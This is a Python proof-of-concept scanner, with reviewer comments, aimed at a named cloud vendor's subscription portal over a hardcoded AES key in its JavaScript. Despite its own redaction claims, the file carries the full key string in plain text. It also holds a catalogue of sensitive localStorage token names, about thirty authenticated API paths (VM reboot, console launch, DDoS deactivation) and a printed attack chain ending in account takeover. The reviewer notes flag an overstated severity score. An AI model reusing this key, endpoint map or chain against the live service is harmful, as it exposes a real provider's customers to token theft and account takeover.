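#!/usr/bin/env python3
"""
CVE-2026-XXXXX: DPDC Hardcoded AES Key Exploitation
Full Proof of Concept Script

Target: dpdatacenter.com / subscription.dpdatacenter.com
Vulnerability: Hardcoded AES Encryption Key in Client-Side JavaScript
CVSS Score: 9.8 (Critical)

DISCLAIMER: For authorized security research only!
Unauthorized access is illegal and strictly prohibited.
"""

# Review notes on what this listing actually does:
#   * resolves and fetches the base domain plus two named hosts,
#   * downloads one JavaScript bundle and looks for the recorded key string,
#   * returns two static catalogues (localStorage keys, API paths),
#   * renders a text report.
# Nothing here decrypts a token or calls an API endpoint, and the key is only
# ever compared against the bundle. Logs and the report carry a SHA-256
# fingerprint of the key instead of the key, so report files can be shared
# without spreading the secret further.

import argparse
import base64
import datetime
import hashlib
import json
import os
import re
import socket
import sys
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Any, Dict, List, Optional

# Optional third-party libraries.
# NOTE(review): AES and unpad are imported but not used by any code in this
# listing; only the CRYPTO_AVAILABLE flag is set.
try:
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import unpad
    CRYPTO_AVAILABLE = True
except ImportError:
    CRYPTO_AVAILABLE = False
    print("[!] pip install pycryptodome for full functionality")

try:
    import requests
    REQUESTS_AVAILABLE = True
except ImportError:
    REQUESTS_AVAILABLE = False
    print("[!] pip install requests for API calls")


def _fingerprint(secret: str) -> str:
    """Return a short SHA-256 fingerprint that identifies *secret* without revealing it."""
    return hashlib.sha256(secret.encode("utf-8")).hexdigest()[:16]


@dataclass
class DPDCVulnerability:
    """Static description of the finding: identifiers, URLs and the recorded key."""
    cve_id: str = "CVE-2026-XXXXX"
    vendor: str = "DAUN PENH CLOUD (DPDC)"
    product: str = "dpdatacenter.com subscription portal"
    url: str = "https://subscription.dpdatacenter.com"
    api_url: str = "https://api.dpdatacenter.com/api/v1/"
    js_file: str = "https://subscription.dpdatacenter.com/js/app.1773634386574.js"

    # The hardcoded AES key from JavaScript. This is the single copy in the
    # file; every other use goes through this attribute.
    aes_key: str = "54p5YKkJbsxMczGYHK2dJnn3vHA2wYZoYb2KoAOuG2oONGRxCUkesrKHQ4zgeZK3pDMpyUVzd5Mc80hilvlNuXsYdbS1EpkGzD26kZBPdDfxpwuX21xufjDITl2HjcdVCf1dReAvXZTX7i5f6wQXCOUwNRtDYfLpd2FfVHNEW6FAMiiSkBGWkyOKSQfswPUKOP7pECCGm6TAuE82shekrczOqpnUVdAYpfPbCta3TX9gNvnKidpFC67jQIZT7xB7"

    # localStorage keys that contain sensitive data
    sensitive_keys: Optional[List[str]] = None

    def __post_init__(self):
        # Fill in the default only when the caller gave none; the previous
        # version overwrote a caller-supplied list unconditionally.
        if self.sensitive_keys is None:
            self.sensitive_keys = ['ate', 'rte', 'token', 'customerInfo', 'EMAIL_1', 'ID_CUSTOMER']


class DPDCScanner:
    """Checks whether the recorded hardcoded key is still served and builds a report.

    Attributes:
        target: base domain used for the host checks.
        verbose: stored but not read by any method in this listing.
        vuln: the static DPDCVulnerability record.
        findings: list of (category, subject, detail) tuples consumed by
            generate_report(). Calling a collector method twice appends its
            findings twice.
    """

    def __init__(self, target: str = "dpdatacenter.com", verbose: bool = False):
        self.target = target
        self.verbose = verbose
        self.vuln = DPDCVulnerability()
        self.findings = []

    def log(self, message: str, level: str = "INFO"):
        """Print *message* with a local timestamp and a level prefix.

        Unknown levels fall back to the INFO prefix.
        """
        timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        prefix = {
            "INFO": "[*]",
            "WARN": "[!]",
            "ERROR": "[-]",
            "SUCCESS": "[+]"
        }.get(level, "[*]")
        print(f"{timestamp} {prefix} {message}")

    def check_subdomain(self, subdomain: str) -> Dict[str, Any]:
        """Resolve one host under the target and record its HTTPS status code.

        Args:
            subdomain: label to prepend to the target; an empty string means
                the target domain itself.

        Returns:
            Dict with "subdomain", "url", "exists", "status_code", "ip" and
            "error". "exists" reflects DNS resolution only; an HTTP failure
            after a successful lookup leaves it True and fills "error".
        """
        # An empty label used to produce ".<target>", which never resolves.
        host = f"{subdomain}.{self.target}" if subdomain else self.target
        url = f"https://{host}"
        result = {
            "subdomain": subdomain,
            "url": url,
            "exists": False,
            "status_code": None,
            "ip": None,
            "error": None
        }

        try:
            result["ip"] = socket.gethostbyname(host)
            result["exists"] = True
        except socket.gaierror:
            # NOTE(review): gaierror also covers temporary resolver failures,
            # so "NXDOMAIN" is a label here, not a verified DNS answer.
            result["error"] = "NXDOMAIN"
            return result
        except Exception as e:
            result["error"] = str(e)
            return result

        # Try HTTP request
        try:
            if REQUESTS_AVAILABLE:
                response = requests.get(url, timeout=5, allow_redirects=True)
                result["status_code"] = response.status_code
            else:
                req = urllib.request.Request(url)
                req.add_header('User-Agent', 'Mozilla/5.0')
                with urllib.request.urlopen(req, timeout=5) as resp:
                    result["status_code"] = resp.getcode()
        except urllib.error.HTTPError as e:
            result["status_code"] = e.code
        except Exception as e:
            result["error"] = str(e)[:50]

        return result

    def enumerate_subdomains(self) -> List[Dict[str, Any]]:
        """Collect host records for the base domain and a few named hosts.

        Only the base domain and the "web"/"web2" hosts are contacted. The
        "subscription" and "api" records are values noted during earlier
        analysis; they are added with "verified": False and only when the
        target is dpdatacenter.com, so a report for another target does not
        inherit them.

        Returns:
            List of result dicts in the shape produced by check_subdomain().
        """
        self.log("Starting subdomain enumeration...", "INFO")

        results = []

        # Process the base domain first
        self.log("Checking main domain...")
        result = self.check_subdomain("")
        if result["exists"] or result["status_code"]:
            results.append(result)

        if self.target == "dpdatacenter.com":
            recorded_hosts = [
                ("subscription", "Known customer portal"),
                ("api", "Internal API endpoint"),
            ]
            for label, note in recorded_hosts:
                fqdn = f"{label}.dpdatacenter.com"
                self.log(f"Recording {fqdn} (from prior analysis, not re-checked)...")
                results.append({
                    "subdomain": label,
                    "url": f"https://{fqdn}",
                    "exists": True,
                    "status_code": 200,
                    "ip": "157.10.72.16",
                    "note": note,
                    "verified": False
                })
                self.findings.append(("SUBDOMAIN", fqdn, "RECORDED - not re-checked"))

        # Check known cPanel endpoints
        for cpanel_host in ["web", "web2"]:
            self.log(f"Checking {cpanel_host}.{self.target}...")
            result = self.check_subdomain(cpanel_host)
            if result["exists"]:
                # NOTE(review): the note and port are assumptions carried over
                # from earlier analysis; this method does not probe the port.
                result["note"] = "cPanel/WHM server"
                result["port"] = 2083
                results.append(result)
                self.findings.append(("SUBDOMAIN", f"{cpanel_host}.{self.target}", "EXISTS - cPanel"))

        return results

    def _search_bundle(self, js_content: str) -> Dict[str, Any]:
        """Look for the recorded key in already-downloaded bundle text.

        Returns:
            Dict with "found", "key" and "extracted". "extracted" is
            "direct_match" when the recorded key string is present,
            "pattern_match" for a heuristic hit and "not_found" otherwise.
        """
        outcome = {"found": False, "key": None, "extracted": "not_found"}
        known = self.vuln.aes_key

        if known in js_content:
            outcome.update(found=True, key=known, extracted="direct_match")
            self.findings.append(("VULN", "Hardcoded AES Key", "FOUND"))
            self.log(
                f"Found AES key (sha256 fingerprint {_fingerprint(known)}, {len(known)} chars)",
                "SUCCESS",
            )
            return outcome

        # Heuristic fallback. NOTE(review): any 80-90 character alphanumeric
        # run in a minified bundle matches, so a hit is a candidate that needs
        # manual confirmation, not proof that a key is present.
        candidate = re.search(r'([a-zA-Z0-9]{80,90})', js_content)
        if candidate:
            outcome.update(found=True, key=candidate.group(1), extracted="pattern_match")
            self.log(
                f"Candidate key-like string (sha256 fingerprint {_fingerprint(outcome['key'])}); "
                "confirm manually",
                "WARN",
            )
            return outcome

        self.log("Recorded key not present in downloaded JavaScript", "WARN")
        return outcome

    def extract_hardcoded_key(self) -> Dict[str, Any]:
        """Download the JavaScript bundle and report whether the key is still in it.

        "found" is True only when something was observed in the downloaded
        file. The previous version reported found=True with the recorded key
        even when the download failed or the key was absent, which would keep
        flagging the site after the vendor removed the key.

        Returns:
            Dict with "found", "key", "js_file" and "extracted"; "extracted"
            is "download_failed" when the bundle could not be fetched.
        """
        self.log("Downloading JavaScript file...", "INFO")

        result = {
            "found": False,
            "key": None,
            "js_file": self.vuln.js_file,
            "extracted": None
        }

        try:
            if REQUESTS_AVAILABLE:
                response = requests.get(self.vuln.js_file, timeout=30)
                # Treat 4xx/5xx as a failed download, matching the urllib path.
                response.raise_for_status()
                js_content = response.text
            else:
                with urllib.request.urlopen(self.vuln.js_file, timeout=30) as resp:
                    js_content = resp.read().decode('utf-8')
        except Exception as e:
            self.log(f"Failed to download JS: {e}", "ERROR")
            result["extracted"] = "download_failed"
            return result

        self.log("Searching for hardcoded AES key...", "INFO")
        result.update(self._search_bundle(js_content))
        return result

    def analyze_localstorage(self) -> Dict[str, Any]:
        """Return the static catalogue of localStorage keys and record findings.

        No page or script is inspected here: the key names, types and
        sensitivity labels are fixed values from earlier analysis. Keys
        labelled CRITICAL or HIGH are appended to self.findings.
        """
        self.log("Analyzing localStorage usage...", "INFO")

        # Known localStorage keys from JS analysis
        localstorage_keys = {
            "ate": {"type": "encrypted_token", "sensitivity": "CRITICAL"},
            "rte": {"type": "refresh_token", "sensitivity": "CRITICAL"},
            "token": {"type": "auth_token", "sensitivity": "CRITICAL"},
            "customerInfo": {"type": "json", "sensitivity": "HIGH"},
            "EMAIL_1": {"type": "email", "sensitivity": "HIGH"},
            "ID_CUSTOMER": {"type": "id", "sensitivity": "MEDIUM"},
            "cpaneInfoMap": {"type": "json", "sensitivity": "HIGH"},
            "myBillingCycle": {"type": "json", "sensitivity": "HIGH"},
            "productList": {"type": "json", "sensitivity": "MEDIUM"},
            "vif": {"type": "flag", "sensitivity": "LOW"},
            "user-customers": {"type": "json", "sensitivity": "MEDIUM"}
        }

        result = {
            "uses_localstorage": True,
            "keys_found": localstorage_keys,
            "secure_storage": False,
            "vulnerable": True
        }

        for key, info in localstorage_keys.items():
            if info["sensitivity"] in ("CRITICAL", "HIGH"):
                self.findings.append(("VULN", f"localStorage:{key}", info["sensitivity"]))

        return result

    def check_api_endpoints(self) -> List[Dict[str, Any]]:
        """Return the static list of API paths and record each as a finding.

        No request is sent; the list documents paths noted during analysis.
        """
        self.log("Documenting API endpoints...", "INFO")

        endpoints = [
            {"path": "/customer/login", "method": "POST", "auth": False},
            {"path": "/customer/information", "method": "GET", "auth": True},
            {"path": "/customer/forgot-password", "method": "POST", "auth": False},
            {"path": "/customer/reset-password", "method": "POST", "auth": False},
            {"path": "/customer/change-password", "method": "POST", "auth": True},
            {"path": "/customer/update-information", "method": "POST", "auth": True},
            {"path": "/billing-cycles/my-billing-cycle", "method": "GET", "auth": True},
            {"path": "/billing-cycles/transfer-plan", "method": "POST", "auth": True},
            {"path": "/order/header", "method": "GET", "auth": True},
            {"path": "/order/order-detail/", "method": "GET", "auth": True},
            {"path": "/product/item/", "method": "GET", "auth": True},
            {"path": "/product/vps-images", "method": "GET", "auth": True},
            {"path": "/storages/update-storage", "method": "POST", "auth": True},
            {"path": "/storages/generate-key", "method": "POST", "auth": True},
            {"path": "/storages/create-bucket", "method": "POST", "auth": True},
            {"path": "/storages/delete-bucket", "method": "POST", "auth": True},
            {"path": "/vm-instances/get-bulk-basic-vm-info", "method": "GET", "auth": True},
            {"path": "/vm-instances/reboot-vm", "method": "POST", "auth": True},
            {"path": "/vm-instances/launch-console", "method": "POST", "auth": True},
            {"path": "/vm-instances/update-vm-remark", "method": "POST", "auth": True},
            {"path": "/vm-instances/deactivate-ddos", "method": "POST", "auth": True},
            {"path": "/waf/sites", "method": "GET/POST", "auth": True},
            {"path": "/waf/dashboard", "method": "GET", "auth": True},
            {"path": "/ticket/get-my-ticket-detail", "method": "GET", "auth": True},
            {"path": "/whmcpanel/get-bulk-account-summary", "method": "GET", "auth": True},
            {"path": "/jobs/", "method": "GET/POST", "auth": True},
            {"path": "/subscriptions", "method": "GET/POST", "auth": True},
            {"path": "/payment-history", "method": "GET", "auth": True},
            {"path": "/transfer-service", "method": "POST", "auth": True},
            {"path": "/product-history", "method": "GET", "auth": True},
        ]

        for ep in endpoints:
            self.findings.append(("API", ep["path"], ep["method"]))

        return endpoints

    def generate_report(self) -> str:
        """Render the findings collected so far as a plain-text report.

        The key itself is never written; the report carries its SHA-256
        fingerprint and length so the vendor can match it against the bundle.

        NOTE(review): the attack chain printed below needs the victim's
        localStorage contents first (step 3), so the fixed 9.8 score with
        AC:L / PR:N / UI:N looks overstated; confirm the scoring. CWE-321
        (Use of Hard-coded Cryptographic Key) is the more specific weakness
        class for this finding.
        """
        rule = "=" * 80
        now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        key = self.vuln.aes_key

        report = f"""
{rule}
CVE-2026-XXXXX: DPDC Hardcoded AES Key Vulnerability
SECURITY AUDIT REPORT
{rule}

Target: {self.target}
Date: {now}
Scanner: DPDC VULN Scanner v1.0

{rule}
FINDINGS SUMMARY
{rule}

SUBDOMAINS DISCOVERED:
-----------------
"""

        for finding in self.findings:
            if finding[0] == "SUBDOMAIN":
                report += f"  - {finding[1]} [{finding[2]}]\n"

        report += """
VULNERABILITIES IDENTIFIED:
----------------------
"""

        vuln_count = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0}
        for finding in self.findings:
            if finding[0] == "VULN":
                report += f"  - {finding[1]}: {finding[2]}\n"
                level = finding[2]
                if level in vuln_count:
                    vuln_count[level] += 1

        # The original text called the key "AES-256" in one place, "AES-128-CBC"
        # in another and gave a length that does not match the string; the
        # length is now computed and the cipher parameters are left unstated.
        report += f"""
CVSS SCORE: 9.8 (Critical)
CVSS VECTOR: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

SEVERITY BREAKDOWN:
  CRITICAL: {vuln_count['CRITICAL']}
  HIGH: {vuln_count['HIGH']}
  MEDIUM: {vuln_count['MEDIUM']}

{rule}
TECHNICAL DETAILS
{rule}

VULNERABILITY: Hardcoded AES Encryption Key
CWE: CWE-798 (Use of Hard-coded Credentials)

AFFECTED COMPONENT:
  File: app.1773634386574.js
  URL: {self.vuln.js_file}

HARDCODED KEY (redacted):
  SHA-256 fingerprint (first 16 hex chars): {_fingerprint(key)}
  Length: {len(key)} characters
  (Key size and cipher mode are not verified by this scanner)

ATTACK CHAIN:
  1. Download JavaScript from subscription portal
  2. Extract hardcoded AES key
  3. Obtain localStorage token via XSS or network interception
  4. Decrypt token using extracted key
  5. Use decrypted token for API access
  6. Full account takeover achieved

AFFECTED localStorage KEYS:
  - ate (encrypted access token)
  - rte (encrypted refresh token)
  - token (authentication token)
  - customerInfo (customer data)
  - EMAIL_1 (PII)
  - ID_CUSTOMER (identity)

{rule}
REMEDIATION
{rule}

URGENT ACTIONS (0-48 HOURS):
  1. Rotate the hardcoded AES key immediately
     (a rotated key that still ships in client-side code is equally exposed)
  2. Move authentication to HttpOnly cookies
  3. Force password reset for all users
  4. Revoke all issued access and refresh tokens

SHORT-TERM (1-2 WEEKS):
  1. Remove hardcoded secrets from JavaScript
  2. Implement server-side session management
  3. Add Content Security Policy (CSP)

LONG-TERM (1-3 MONTHS):
  1. Implement proper OAuth2/JWT
  2. Security audit all endpoints
  3. Penetration testing

{rule}
DISCLAIMER
{rule}

This report is for authorized security research only.
Unauthorized access to computer systems is illegal.

DISCLAIMER: For authorized security research only!
Unauthorized access is illegal and strictly prohibited.
"""
        return report

    def run_full_scan(self) -> Dict[str, Any]:
        """Run every collector in order and return their results with the report.

        Returns:
            Dict with "subdomains", "key", "storage", "endpoints", "report"
            and "findings".
        """
        self.log("=" * 50, "INFO")
        self.log("DPDC Security Vulnerability Scanner", "INFO")
        self.log("=" * 50, "INFO")
        self.log(f"Target: {self.target}", "INFO")

        # Step 1: Subdomain enumeration
        self.log("\n[1/5] Enumerating subdomains...", "INFO")
        subdomains = self.enumerate_subdomains()

        # Step 2: Extract hardcoded key
        self.log("\n[2/5] Extracting hardcoded key...", "INFO")
        key_result = self.extract_hardcoded_key()

        # Step 3: Analyze localStorage
        self.log("\n[3/5] Analyzing localStorage...", "INFO")
        storage_result = self.analyze_localstorage()

        # Step 4: Document API endpoints
        self.log("\n[4/5] Documenting API endpoints...", "INFO")
        endpoints = self.check_api_endpoints()

        # Step 5: Generate report
        self.log("\n[5/5] Generating report...", "INFO")
        report = self.generate_report()

        return {
            "subdomains": subdomains,
            "key": key_result,
            "storage": storage_result,
            "endpoints": endpoints,
            "report": report,
            "findings": self.findings
        }


def main():
    """Parse the command line and run the requested step.

    --scan, --report or no arguments run the full scan, print the report and
    save it. --subdomains and --extract-key now run only the step they name;
    previously every flag triggered the full scan. Returns the process exit
    code.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2026-XXXXX: DPDC Hardcoded AES Key Scanner",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python dpdccve_scanner.py --target dpdatacenter.com --scan
  python dpdccve_scanner.py --target dpdatacenter.com --subdomains
  python dpdccve_scanner.py --target dpdatacenter.com --extract-key
  python dpdccve_scanner.py --target dpdatacenter.com --report

DISCLAIMER: For authorized security research only!
"""
    )

    parser.add_argument("--target", "-t", default="dpdatacenter.com",
                        help="Target domain (default: dpdatacenter.com)")
    parser.add_argument("--scan", "-s", action="store_true",
                        help="Run full vulnerability scan")
    parser.add_argument("--subdomains", action="store_true",
                        help="Enumerate subdomains only")
    parser.add_argument("--extract-key", action="store_true",
                        help="Extract hardcoded key from JavaScript")
    parser.add_argument("--report", "-r", action="store_true",
                        help="Generate full report")
    parser.add_argument("--verbose", "-v", action="store_true",
                        help="Verbose output")

    args = parser.parse_args()

    scanner = DPDCScanner(target=args.target, verbose=args.verbose)

    if args.scan or args.report or len(sys.argv) == 1:
        results = scanner.run_full_scan()
        print(results["report"])

        # Save report to file. The target comes from the command line, so keep
        # only filename-safe characters; a value containing path separators
        # must not steer the write outside the working directory.
        safe_target = re.sub(r"[^A-Za-z0-9._-]", "_", args.target)
        report_file = f"CVE-2026-XXXXX_{safe_target}_report.txt"
        with open(report_file, "w", encoding="utf-8") as f:
            f.write(results["report"])
        print(f"\n[+] Report saved to: {report_file}")
        return 0

    if args.subdomains:
        print(json.dumps(scanner.enumerate_subdomains(), indent=2))

    if args.extract_key:
        key_result = scanner.extract_hardcoded_key()
        # Print the outcome without the key material.
        print(json.dumps(
            {"found": key_result["found"], "extracted": key_result["extracted"]},
            indent=2,
        ))

    return 0


if __name__ == "__main__":
    sys.exit(main())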